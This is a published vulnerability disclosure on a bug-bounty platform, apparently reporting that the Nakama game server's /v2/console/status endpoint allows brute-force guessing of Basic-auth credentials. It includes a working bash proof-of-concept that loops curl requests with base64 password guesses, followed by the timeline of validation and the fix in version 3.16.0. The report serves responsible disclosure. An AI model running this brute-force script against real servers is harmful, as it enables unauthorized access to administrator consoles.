Login bruteforce in heroiclabs/nakama

Valid

Reported on

Aug 24th 2022

Description

According to the fix of the previous report, the login page has a rate limit mechanism to block the user’s IP when many attempts are made. The endpoint, for example, /v2/console/status only returns the content when who made the request has the correct rights. However, this request is not being handled against brute-force attacks.

Proof of Concept

The attacker can use Authorization: Basic, represented by a base64 string containing <user>:<password>. So the attacker only needs to send <user>:<password> via the HTTP header Authorization, and check the HTTP response code (200).

#!/bin/bash

HOST="localhost"
PORT=7351

USER="admin"
PASSWORD="password"

request() {
  token=$1
  
  res=$(curl -i -s -k "http://$HOST:$PORT/v2/console/status" \
    -H "Authorization: Basic $token" | head -n1 | grep 200)

  if [[ $res != '' ]]; then
    echo ">>> Found: $(echo $token | base64 -d)"
  else
    echo "Wrong: $(echo $token | base64 -d)"
  fi
}

# 1000 wrong tries
for i in {1..1000}; do
  request $(echo -n "user:password$i" | base64)
done

request $(echo -n "$USER:$PASSWORD" | base64)

Impact

Login bruteforce attacks.

We are processing your report and will contact the heroiclabs/nakama team within 24 hours. 7 months ago
We have contacted a member of the heroiclabs/nakama team and are waiting to hear back 7 months ago
heroiclabs/nakama maintainer has acknowledged this report 7 months ago
Renan Rocha
6 months ago

Researcher

Ping

Andrei Mihu validated this vulnerability 2 months ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Andrei Mihu marked this as fixed in 3.16.0 with commit d1e894 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Feb 1st 2023
api.go#L299-L421 has been validated
Andrei Mihu published this vulnerability 2 months ago
to join this conversation